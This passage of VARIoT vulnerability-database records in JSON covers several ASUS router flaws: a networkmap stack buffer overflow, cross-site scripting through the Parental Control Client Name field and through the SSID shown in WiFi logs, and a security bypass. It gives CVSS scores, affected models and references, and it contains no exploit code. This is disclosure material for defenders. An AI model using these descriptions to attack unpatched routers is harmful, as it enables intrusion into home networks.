"severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-101841", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-11420", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-11420", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-11420", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2017-24400", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201707-754", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-101841", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNNVD", "id": "CNNVD-201707-754" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300", "sources": [ { "db": "NVD", "id": "CVE-2017-11420" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "OPENWALL", "id": "OSS-SECURITY/2017/07/13/1", "trust": 3.1 }, { "db": "NVD", "id": "CVE-2017-11420", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2017-005985", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201707-754", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2017-24400", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-101841", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNNVD", "id": "CNNVD-201707-754" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "id": "VAR-201707-0535", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" } ], "trust": 1.342782942 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" } ] }, "last_update_date": "2024-11-23T22:26:44.352000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://asuswrt.lostrealm.ca/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005985" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-101841" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://www.openwall.com/lists/oss-security/2017/07/13/1" }, { "trust": 1.1, "url": "https://asuswrt.lostrealm.ca/changelog" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11420" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11420" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNNVD", "id": "CNNVD-201707-754" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "VULHUB", "id": "VHN-101841" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNNVD", "id": "CNNVD-201707-754" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-24400" }, { "date": "2017-07-18T00:00:00", "db": "VULHUB", "id": "VHN-101841" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "date": "2017-07-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-754" }, { "date": "2017-07-18T05:29:00.470000", "db": "NVD", "id": "CVE-2017-11420" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-24400" }, { "date": "2017-12-20T00:00:00", "db": "VULHUB", "id": "VHN-101841" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "date": "2017-07-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-754" }, { "date": "2024-11-21T03:07:45.487000", "db": "NVD", "id": "CVE-2017-11420" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-754" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map ASUS_Discovery.c Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005985" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-754" } ], "trust": 0.6 } }
var-202001-1689
Vulnerability from variot
ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation.
A cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1689", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.372_67" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.8, "vendor": "asustek computer", "version": "rt-ac66u firmware 3.0.0.4.372_67" }, { "model": "wrt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "cve": "CVE-2020-7997", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2020-7997", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-04914", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2020-7997", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 6.1, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2020-7997", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Changed", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-7997", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2020-7997", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2020-04914", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202001-1236", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation. \n\r\n\r\nA cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code", "sources": [ { "db": "NVD", "id": "CVE-2020-7997" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "CNVD", "id": "CNVD-2020-04914" } ], "trust": 2.16 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-7997", "trust": 3.0 }, { "db": "JVNDB", "id": "JVNDB-2020-001472", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-04914", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202001-1236", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "id": "VAR-202001-1689", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" } ], "trust": 1.35703795 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" } ] }, "last_update_date": "2024-11-23T23:01:32.365000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "RTAC66U", "trust": 0.8, "url": "https://www.asus.com/Networking/RTAC66U/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-001472" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.0 }, { "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7997" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-04914" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-04914" }, { "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "db": "NVD", "id": "CVE-2020-7997" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-13T00:00:00", "db": "CNVD", "id": "CNVD-2020-04914" }, { "date": "2020-02-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "date": "2020-01-28T00:00:00", "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "date": "2020-01-28T05:15:11.447000", "db": "NVD", "id": "CVE-2020-7997" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-13T00:00:00", "db": "CNVD", "id": "CNVD-2020-04914" }, { "date": "2020-02-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-001472" }, { "date": "2021-01-05T00:00:00", "db": "CNNVD", "id": "CNNVD-202001-1236" }, { "date": "2024-11-21T05:38:10.003000", "db": "NVD", "id": "CVE-2020-7997" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS\u00a0WRT-AC66U\u00a03\u00a0RT\u00a0 Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-001472" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-202001-1236" } ], "trust": 0.6 } }
var-201401-0754
Vulnerability from variot
Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks. ASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0754", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-n66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n16", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac56u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" } ], "sources": [ { "db": "BID", "id": "65558" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Kyle Lovett", "sources": [ { "db": "BID", "id": "65558" } ], "trust": 0.3 }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability.\nAttackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks.\nASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.", "sources": [ { "db": "BID", "id": "65558" } ], "trust": 0.3 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "BID", "id": "65558", "trust": 0.3 } ], "sources": [ { "db": "BID", "id": "65558" } ] }, "id": "VAR-201401-0754", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.539766506 }, "last_update_date": "2022-05-17T02:09:50.265000Z", "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.3, "url": "https://www.asus.com/networking/rtac68u/#support" }, { "trust": 0.3, "url": "https://www.asus.com/" } ], "sources": [ { "db": "BID", "id": "65558" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "65558" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-01-06T00:00:00", "db": "BID", "id": "65558" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-01-06T00:00:00", "db": "BID", "id": "65558" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "65558" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple ASUS RT Routers Remote Security Bypass Vulnerability", "sources": [ { "db": "BID", "id": "65558" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input Validation Error", "sources": [ { "db": "BID", "id": "65558" } ], "trust": 0.3 } }
var-202207-0160
Vulnerability from variot
ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202207-0160", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "zenwifi xd4s", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi ac mini", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac58u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax86u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac87u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-acrh13", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12vp b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac66r", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac2400", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi pro et12", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac5300", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12e c1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac55u", 